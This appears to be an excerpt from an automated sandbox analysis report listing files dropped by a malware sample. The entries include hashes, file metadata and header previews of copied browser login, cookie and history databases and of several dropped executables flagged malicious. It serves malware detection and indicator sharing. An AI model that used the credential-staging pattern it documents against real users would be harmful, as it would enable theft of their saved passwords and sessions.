                                                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\D87fZN3R3jFeWeb Data

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Users\user\Desktop\I2jCDr35mu.exe
                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                                  Entropy (8bit):1.136471148832945
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                                                                                                                  MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                                                                                                                  SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                                                                                                                  SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                                                                                                                  SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\D87fZN3R3jFeplaces.sqlite

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Users\user\Desktop\I2jCDr35mu.exe
                                                                                                                                                                                  File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):5242880
                                                                                                                                                                                  Entropy (8bit):0.0357803477377646
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:58rJQaXoMXp0VW9FxWwJU0VnQphI1mJ/8GJK:58r54w0VW3xWB0VaI4
                                                                                                                                                                                  MD5:76D181A334D47872CD2E37135CC83F95
                                                                                                                                                                                  SHA1:B563370B023073CE6E0F63671AA4AF169ABBF4E1
                                                                                                                                                                                  SHA-256:52D831CC6F56C3A25EB9238AAF25348E1C4A3D361DFE7F99DB1D37D89A0057FD
                                                                                                                                                                                  SHA-512:23E0D43E4785E5686868D5448628718720C5A8D9328EE814CB77807260F7CDA2D01C5DEE8F58B5713F4F09319E6CB7AB24725078C01322BAE04777418A49A9F7
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\Ei8DrAmaYu9KLogin Data

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Users\user\Desktop\I2jCDr35mu.exe
                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\IWPfiAXUTJTSHistory

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Users\user\Desktop\I2jCDr35mu.exe
                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):159744
                                                                                                                                                                                  Entropy (8bit):0.5394293526345721
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                                                                                                                                                  MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                                                                                                                                                  SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                                                                                                                                                  SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                                                                                                                                                  SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exe

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Users\user\Desktop\I2jCDr35mu.exe
                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):917504
                                                                                                                                                                                  Entropy (8bit):6.5798614215687845
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:12288:MqDEvFo+yo4DdbbMWu/jrQu4M9lBAlKhQcDGB3cuBNGE6iOrpfe4JdaDgaKTx:MqDEvCTbMWu7rQYlBQcBiT6rprG8aax
                                                                                                                                                                                  MD5:CBE3CA8AEB654F541B59B3F97C0C9492
                                                                                                                                                                                  SHA1:C775259EB2B550BA7A9C49A12138562D9753D450
                                                                                                                                                                                  SHA-256:11E7D4527918A37E28F345ACF4A6E6AE7665D7D204543232E9400F92C58CB367
                                                                                                                                                                                  SHA-512:C0987C12B294CF37FF40F45EFF08F32A3A7F806B6A3C968832C5A2A44AEAE92AF32F229A8C5D5B60C806C8B6FC9AB1C411EC45C18AFC4D4F4675ED73F4B8E186
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...................j:......j:..C...j:......@.*...........................n......~............{.......{......{.......z....{......Rich...................PE..L......e.........."..........P......w.............@..........................`............@...@.......@.....................d...|....@...........................u...........................4..........@............................................text............................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc........@......................@..@.reloc...u.......v..................@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KvHrxJ77cmUgLogin Data

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Users\user\Desktop\I2jCDr35mu.exe
                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):51200
                                                                                                                                                                                  Entropy (8bit):0.8745947603342119
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                                                                                                                                                  MD5:378391FDB591852E472D99DC4BF837DA
                                                                                                                                                                                  SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                                                                                                                                                  SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                                                                                                                                                  SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\QdX9ITDLyCRBWeb Data

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Users\user\Desktop\I2jCDr35mu.exe
                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                                  Entropy (8bit):1.136471148832945
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                                                                                                                  MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                                                                                                                  SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                                                                                                                  SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                                                                                                                  SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\RhvHlFoQ86AMGIsTANJB.exe

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Users\user\Desktop\I2jCDr35mu.exe
                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1755136
                                                                                                                                                                                  Entropy (8bit):7.944061716574701
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:49152:4+5L+Qg75yHWPUqbVpWlBRd1jcOHmf0FqSoYR2DPoWq:4+dFHWPS/Rd1IY4hoV
                                                                                                                                                                                  MD5:FA2940984475E3DD89E37F15DBE8A88F
                                                                                                                                                                                  SHA1:C7CFA3A0F500441CE22EF72BBD9BE7988F07C4D3
                                                                                                                                                                                  SHA-256:04BA7F7A64595085447F1D659F91D98693E53333F323EC7826A0E0D03918B626
                                                                                                                                                                                  SHA-512:C30C965067519BF3B172362AA5DF510FE867CAFE14BED875049F984B18018801119BD334B4ED49ED63E93D11F2A4C8D2397024D41328471E842445497B43F49C
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Preview:MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....$e.........."...0..$............E.. ...`....@.. ........................F.....}H....`.................................m........`.............................................................................................................. . .@... ....... ..............@....rsrc........`.......2..............@....idata . ...........6..............@... ..*..........8..............@...odmizeae.....@+......:..............@...wjrksujl. ....E.....................@...................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\UPG2LoPXwc7OWeb Data

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Users\user\Desktop\I2jCDr35mu.exe
                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):196608
                                                                                                                                                                                  Entropy (8bit):1.1239949490932863
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                                                                                                                  MD5:271D5F995996735B01672CF227C81C17
                                                                                                                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                                                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                                                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\ZUEHnz5YzDsyCHbnegZs.exe

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Users\user\Desktop\I2jCDr35mu.exe
                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                  Category:modified
                                                                                                                                                                                  Size (bytes):2399744
                                                                                                                                                                                  Entropy (8bit):7.962349167063599
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:49152:nBeLY5wqsk2vUnzPT7uc1eb0MmZEazB2XP3Oxc1tHTf:wIt0vcrT7ucAvm90fG
                                                                                                                                                                                  MD5:0EC84D886E773CBA442A61606DF14F06
                                                                                                                                                                                  SHA1:404EFBEAE6B921DCFC1FBE5B90EE47E5FB7B8038
                                                                                                                                                                                  SHA-256:B29798AA1B8E46207A37CCD73613B87BC8F2A6D50774D0079CF7AB341B1EBB3D
                                                                                                                                                                                  SHA-512:5C026CDC1752F026D37AF3619E78565EDC8896DA35D65B373042D200A7C95003518B01D825B5101CD013F7F142505B5F1328D177202C3F76489C1BF787238A52
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......C.........L.....L.....L.....H.G...H.....H.....H...R.L.....L.....L...............E.....-........Rich..........PE..L......e...............".....V........\...........@...........................\.....}.$...@.................................W...k....`...C.......................................................................................................... . .P..........................@....rsrc....C...`......................@....idata ............................@... ..-.........................@...gakjennq.p...@A..j..................@...brsozmps......\......x$.............@....taggant.0....\.."...|$.............@...................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\ZunTSaNJLBVfWeb Data

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Users\user\Desktop\I2jCDr35mu.exe
                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):196608
                                                                                                                                                                                  Entropy (8bit):1.1239949490932863
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                                                                                                                  MD5:271D5F995996735B01672CF227C81C17
                                                                                                                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                                                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                                                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\fkGORKNF0MOvzFIhlS3N.exe

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Users\user\Desktop\I2jCDr35mu.exe
                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1166336
                                                                                                                                                                                  Entropy (8bit):7.03555490248727
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24576:NqDEvCTbMWu7rQYlBQcBiT6rprG8aSe2+b+HdiJUC:NTvC/MTQYxsWR7aSe2+b+HoJU
                                                                                                                                                                                  MD5:BA8A470327E60DD9B1CC33B37B5FA8B7
                                                                                                                                                                                  SHA1:2B540D9587B66C173834093045604CF42AEFDCD6
                                                                                                                                                                                  SHA-256:7080E78161D06FED8CD87E3CF5F3B087C15F5E07561FC413F65D86FE73529A46
                                                                                                                                                                                  SHA-512:F9BC2346917751B2AED22E4B9810539513431FC5B70A2BAB0054C2C6831C9C8EF8B06453749E57E6F52BF66C083C457F39231E3B57BB6BA93B7096DBD44E4FA0
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...................j:......j:..C...j:......@.*...........................n......~............{.......{......{.......z....{......Rich...................PE..L......e..........".................w.............@..........................0.......*....@...@.......@.....................d...|....@..xa.......................u...........................4..........@............................................text............................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc...xa...@...b..................@..@.reloc...u.......v...V..............@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exe

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Users\user\Desktop\I2jCDr35mu.exe
                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1882112
                                                                                                                                                                                  Entropy (8bit):7.949517224812261
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:49152:wLi2wNaeFSEYrdH8UesU02hUv21QLUmRa2obb:oHnDEYrPW0cUvCmz+b
                                                                                                                                                                                  MD5:2C4C8C25D448625A0184403CA56EDB2D
                                                                                                                                                                                  SHA1:61531D43B5ADE8F66FD2409DF1A20902EF1A781E
                                                                                                                                                                                  SHA-256:01024AF50DDAF78F4F6A96B4E537400D4572A47E60CCF542F9EE6771DCDBAC0F
                                                                                                                                                                                  SHA-512:CCF51E10D1AAE0F669B771669F67500E1B7EE712A5078B947D256B57E722244F11F01B018820C4B53D1069137F5F4859E3353D8BE601F4E80AC1ECF939F30368
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......*R..n3.@n3.@n3.@5[.A`3.@5[.A.3.@.^.A|3.@.^.Az3.@.^.A.3.@5[.Az3.@5[.A}3.@n3.@.3.@.].Ao3.@.]u@o3.@.].Ao3.@Richn3.@........................PE..L......e.............................@J...........@..........................pJ.....6.....@.................................Vp..j....`........................J...............................J..................................................... . .P..........................@....rsrc........`......................@....idata .....p......................@... ..*.........................@...tfywulqz......0.....................@...prpgnkkw.....0J.....................@....taggant.0...@J.."..................@...................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\o0qT3dWYBP7ZHistory

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Users\user\Desktop\I2jCDr35mu.exe
                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):155648
                                                                                                                                                                                  Entropy (8bit):0.5407252242845243
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                                                                                                                                  MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                                                                                                                  SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                                                                                                                  SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                                                                                                                                  SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\oOPEmFmu_xsJCookies

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Users\user\Desktop\I2jCDr35mu.exe
                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                  Entropy (8bit):0.8508558324143882
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                                                                                                                                                  MD5:933D6D14518371B212F36C3835794D75
                                                                                                                                                                                  SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                                                                                                                                                  SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                                                                                                                                                  SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\pSE1jchbiT9aHistory

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Users\user\Desktop\I2jCDr35mu.exe
                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):155648
                                                                                                                                                                                  Entropy (8bit):0.5407252242845243
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                                                                                                                                  MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                                                                                                                  SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                                                                                                                  SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                                                                                                                                  SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\suOrwW4ZcUbjWeb Data

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Users\user\Desktop\I2jCDr35mu.exe
                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):196608
                                                                                                                                                                                  Entropy (8bit):1.1239949490932863
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                                                                                                                  MD5:271D5F995996735B01672CF227C81C17
                                                                                                                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                                                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                                                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\zs1nXDHCjbiIGotgg4qJ.exe

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Users\user\Desktop\I2jCDr35mu.exe
                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):3001856
                                                                                                                                                                                  Entropy (8bit):7.9902601078319515
                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                  SSDEEP:49152:fBAdrMlL5e9wo9gMj0rnjBzhDqRBsFhU186LnFrq/OdncDhIYaMFEFT:KtJwogMYDll+R6FhtYdEwnW+YaMFqT
                                                                                                                                                                                  MD5:A19B05B874E77B99515C397C5DE13F48
                                                                                                                                                                                  SHA1:6996028DDF12116E8BB0FBCD5FA693DE0E14B78A
                                                                                                                                                                                  SHA-256:C6DC8E17A1D4A1545A12027D8FB15A2C625CE3781CD2062976861CEBAAE37A9A
                                                                                                                                                                                  SHA-512:4E0B6AA347062911D76DD6C6D575FD82CFA7F2C8C0A308967E77DC1ABDA2C7E14DFD0942869BDDD59E800359490FD2FC1AF08FFCD466428347473E20136001A4
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......C.........L.....L.....L.....H.G...H.....H.....H...R.L.....L.....L...............E.....-........Rich..................PE..L...N@.e...............".....`......$............@......................................@... .. .... .. .......... `.......l..x....0..h....................`.......................................................................................................4..................@............p......."...8..............@............@...0.......Z..............@............0...p.......b..............@....................d...b..............@....rsrc....0...0...0..................@..@..........x..`...(..................@....data.....!..0....!.................@...................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\heidiMl1n683teX9h\02zdBXl47cvzHistory

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):159744
                                                                                                                                                                                  Entropy (8bit):0.5394293526345721
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                                                                                                                                                  MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                                                                                                                                                  SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                                                                                                                                                  SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
